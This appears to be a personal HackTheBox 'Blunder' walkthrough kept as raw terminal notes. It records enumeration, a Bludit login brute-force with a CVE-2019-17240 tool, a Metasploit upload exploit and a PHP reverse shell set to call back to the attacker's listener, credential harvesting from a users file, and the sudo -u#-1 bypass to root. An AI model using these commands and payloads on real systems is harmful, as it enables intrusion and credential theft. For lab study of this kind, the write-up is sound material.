HTB Blunder done
Blunder
Notes
OS:
Linux
Technology:
IP Address:
10.129.214.172
10.129.95.225
Open ports:
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Users and pass:
After cracking login and password to website
U: fergus
P: RolandDeschain
---
From /var/www/bludit-3.10.0a/bl-content/databases/users.php
L: hugo
P: Password120
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.214.172_nmap 10.129.214.172 ; cat 10.129.214.172_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 13:43 CET
Nmap scan report for 10.129.214.172
Host is up (0.087s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts
Ffuz
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ ffuf -u http://10.129.214.172/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.214.172_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git | grep -v "2395"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.214.172/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.214.172_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
0 [Status: 200, Size: 7584, Words: 794, Lines: 171, Duration: 193ms]
LICENSE [Status: 200, Size: 1083, Words: 155, Lines: 22, Duration: 112ms]
README.md [Status: 200, Size: 2893, Words: 251, Lines: 71, Duration: 40ms]
about [Status: 200, Size: 3299, Words: 225, Lines: 106, Duration: 66ms]
[INFO] Adding a new job to the queue: http://10.129.214.172/admin/FUZZ
admin [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 128ms]
cgi-bin/ [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 71ms]
install.php [Status: 200, Size: 30, Words: 5, Lines: 1, Duration: 102ms]
robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2, Duration: 66ms]
robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2, Duration: 59ms]
todo.txt [Status: 200, Size: 118, Words: 20, Lines: 5, Duration: 44ms]
usb [Status: 200, Size: 3978, Words: 304, Lines: 111, Duration: 51ms]
[INFO] Starting queued job on target: http://10.129.214.172/admin/FUZZ
ajax [Status: 401, Size: 0, Words: 1, Lines: 1, Duration: 77ms]
:: Progress: [163752/163752] :: Job [2/2] :: 190 req/sec :: Duration: [0:12:54] :: Errors: 0 ::
Read website: http://10.129.214.172/todo.txt
Found username: fergus
---
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
Bruteforce login
Download exploit:
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ git clone https://github.com/spyx/cve-2019-17240.git
Cloning into 'cve-2019-17240'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 6 (delta 0), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), 3.38 MiB | 4.07 MiB/s, done.
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ cd cve-2019-17240
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ ls
cve-2019-17240 cve-2019-17240.go pass.txt README.md
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ ./cve-2019-17240
2025/03/27 14:23:20 invalid argument
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ ./cve-2019-17240 --help
Usage of ./cve-2019-17240:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
Create custom wordlist - cewl
Wordlist rockyou.txt is not good choose
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ cewl http://10.129.214.172 > wordlist.txt
Run exploit
U: fergus
P: RolandDeschain
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Blunder/cve-2019-17240]
└─$ ./cve-2019-17240 -l http://10.129.95.225/admin/login.php -u fergus -p wordlist.txt
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 70
Total requests sent: 80
Total requests sent: 90
Total requests sent: 100
Total requests sent: 110
Total requests sent: 120
Total requests sent: 130
Total requests sent: 140
Total requests sent: 150
Total requests sent: 160
Total requests sent: 170
Total requests sent: 180
Total requests sent: 190
Total requests sent: 200
Total requests sent: 210
Total requests sent: 220
Total requests sent: 230
Total requests sent: 240
Total requests sent: 250
Total requests sent: 260
Total requests sent: 264
==========Password Cracked=============Password: RolandDeschain
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ msfconsole -q
msf6 > search bludit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability
msf6 exploit(linux/http/bludit_upload_images_exec) > show options
Module options (exploit/linux/http/bludit_upload_images_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
BLUDITPASS RolandDeschain yes The password for Bludit
BLUDITUSER fergus yes The username for Bludit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.95.225 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit
/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Bludit
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.92 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Bludit v3.9.2
View the full module info with the info, or info -d command.
Run revshell
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.92] from (UNKNOWN) [10.129.95.225] 50872
Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:07:35 up 51 min, 1 user, load average: 0.06, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
shaun :0 :0 13:15 ?xdm? 42.18s 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
---
msf6 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.92:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading SzoDUCOVKp.png...
[*] Uploading .htaccess...
[*] Executing SzoDUCOVKp.png...
[*] Sending stage (40004 bytes) to 10.129.95.225
[+] Deleted .htaccess
[*] Meterpreter session 2 opened (10.10.14.92:4444 -> 10.129.95.225:40864) at 2025-03-28 15:06:39 +0100
pwd
meterpreter > pwd
/var/www/bludit-3.9.2/bl-content/tmp
meterpreter > cd ../../
meterpreter > upload revshell.php
[*] Uploading : /home/kali/Desktop/writeups/HTB/HTB_Blunder/revshell.php -> revshell.php
[*] Uploaded -1.00 B of 5.36 KiB (-0.02%): /home/kali/Desktop/writeups/HTB/HTB_Blunder/revshell.php -> revshell.php
[*] Completed : /home/kali/Desktop/writeups/HTB/HTB_Blunder/revshell.php -> revshell.php
meterpreter >
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ cp php-reverse-shell.php revshell.php
---
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.92'; // CHANGE THIS
$port = 80; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
Find creds in file: /var/www/bludit-3.10.0a/bl-content/databases/users.php
L: hugo
P: Password120
It is SHA1 --> "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d"
---
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
Read flag: user.txt
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@blunder:/$ export TERM=xterm
export TERM=xterm
www-data@blunder:/$ ^Z
zsh: suspended netcat -lvnp 80
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Blunder]
└─$ stty raw -echo; fg
[1] + continued netcat -lvnp 80
stty rows 38 columns 116
www-data@blunder:/$ su hugo
Password:
hugo@blunder:/$ cd ~
hugo@blunder:~$ ls -a
. .bash_history .bashrc .config Documents .gnupg .mozilla Pictures Public Templates Videos
.. .bash_logout .cache Desktop Downloads .local Music .profile .ssh user.txt
hugo@blunder:~$
hugo@blunder:~$ cat user.txt
1863012b573ab12cab20e49e5189679e
hugo@blunder:~$
Privilege Escalation
sudo -l
hugo@blunder:~$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
hugo@blunder:~$ sudo -l
Password:
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:~$
Find exploit: sudo 1.8.27 - Security Bypass
sudo 1.8.27 - Security Bypass
sudo -u#-1 /bin/bash
---
hugo@blunder:~$ sudo -V
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
hugo@blunder:~$
hugo@blunder:~$
hugo@blunder:~$ sudo -u#-1 /bin/bash
root@blunder:/home/hugo#
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
Read flag: root.txt
root@blunder:/home/hugo# cd /root
root@blunder:/root# ls
log reset.sh root.txt snap
root@blunder:/root#
root@blunder:/root# cat root.txt
29f8a09dd9a70ef836832a8025e55b5b
References
[sudo 1.8.27 - Security Bypass](https://www.exploit-db.com/exploits/47502)
Lessons Learned